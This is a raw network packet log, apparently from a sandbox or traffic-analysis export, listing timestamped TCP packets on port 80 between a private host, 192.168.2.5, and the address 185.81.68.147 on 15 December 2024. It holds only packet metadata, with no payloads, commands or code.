                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.581177950 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.581245899 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.582294941 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.582361937 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.582427025 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.583422899 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.583558083 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.583623886 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.584606886 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.584661961 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.584773064 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.585916042 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.585993052 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.586061001 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.587025881 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.587115049 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.587184906 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.588078976 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.588160992 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.588226080 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.589332104 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.589478016 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.589545012 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.590395927 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.590481997 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.590549946 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.591557980 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.591759920 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.591831923 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.592724085 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.592812061 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.592885971 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.593874931 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.594038010 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.594114065 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.595067024 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.595089912 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.595156908 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.596209049 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.596262932 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.596332073 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.597299099 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.645648003 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.728696108 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.728872061 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.728945017 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.729207993 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.729394913 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.729480028 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.730344057 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.730485916 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.730551958 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.731525898 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.731733084 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.731806993 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.732671022 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.732801914 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.732868910 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.733973980 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.733987093 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.734071970 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.735021114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.735116005 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.735188007 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.736159086 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.736314058 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.736387014 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.737423897 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.737436056 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.737510920 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.738569975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.738771915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.738847017 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.739774942 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.920838118 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.920989990 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.921077013 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.921509027 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.921849966 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.921936035 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.922473907 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.922600985 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.922669888 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.923666954 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.923700094 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.923770905 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.924767971 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.924963951 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.925043106 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.926029921 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.926042080 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.926121950 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.927138090 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.927299976 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.927367926 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.928328991 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.928569078 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.928642035 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.929546118 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.929696083 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.929759979 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.930728912 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.930773973 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.930835009 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.931808949 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.931907892 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.931989908 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.933054924 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.933223963 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.933300018 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.934120893 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.934326887 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.934401989 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.935260057 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.935328960 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.935399055 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.936423063 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.936624050 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.936697006 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.937599897 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.937778950 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.937854052 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.938702106 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.938914061 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.938977957 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.939940929 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.940318108 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.940387011 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.941076040 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.941145897 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.941214085 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.942209005 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.942495108 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.942565918 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.943358898 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.943516016 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.943591118 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.944502115 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.944684982 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.944751978 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.945677996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.945796967 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.945869923 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.946867943 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.946959972 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.947033882 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.948077917 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.948120117 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.948189974 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.949150085 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.949253082 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.949310064 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.950352907 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.950627089 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.950695992 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.951598883 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.951611996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.951695919 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.952763081 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.952773094 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.952847004 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.953802109 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.953905106 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.953974009 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.954956055 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.955095053 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.955177069 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.956156015 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.956269026 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.956340075 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.957331896 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:14.957715034 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.137929916 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.137944937 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.137974977 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.139098883 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.139110088 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.139148951 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.140276909 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.140290022 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.140333891 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.141379118 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.141432047 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.141483068 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.142534971 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.142582893 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.142656088 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.143754005 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.143799067 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.143810034 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.144830942 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.144922972 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.145091057 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.146003008 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.146078110 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.146143913 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.147211075 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.147273064 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.147294044 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.148302078 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.148349047 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.148401976 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.149466991 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.149523020 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.149555922 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.150727987 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.150748014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.150774956 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.151757002 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.151809931 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.151837111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.152991056 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.153064966 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.153090954 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.154115915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.154164076 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.154175043 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.155256033 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.155303955 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.155374050 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.156502962 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.156522036 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.156548023 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.157686949 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.157706022 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.157740116 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.158720970 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.158768892 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.158780098 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.160012960 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.160034895 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.160060883 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.161103964 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.161165953 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.161453009 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.162408113 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.162426949 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.162460089 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.163548946 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.163568020 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.163589954 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.164580107 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.164633036 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.164661884 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.165885925 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.165936947 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.166107893 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.166894913 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.166948080 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.166965008 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.168011904 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.168081999 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.168163061 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.169239998 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.169289112 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.169356108 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.170340061 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.170399904 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.170547009 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.171643972 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.171684980 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.171704054 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.172700882 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.172763109 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.172813892 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.223751068 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.305000067 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.305016041 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.305354118 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.305387020 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.356508017 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.356626034 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.356652975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.356775045 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.357624054 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.357877970 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:15.358114958 CET4970880192.168.2.5185.81.68.147
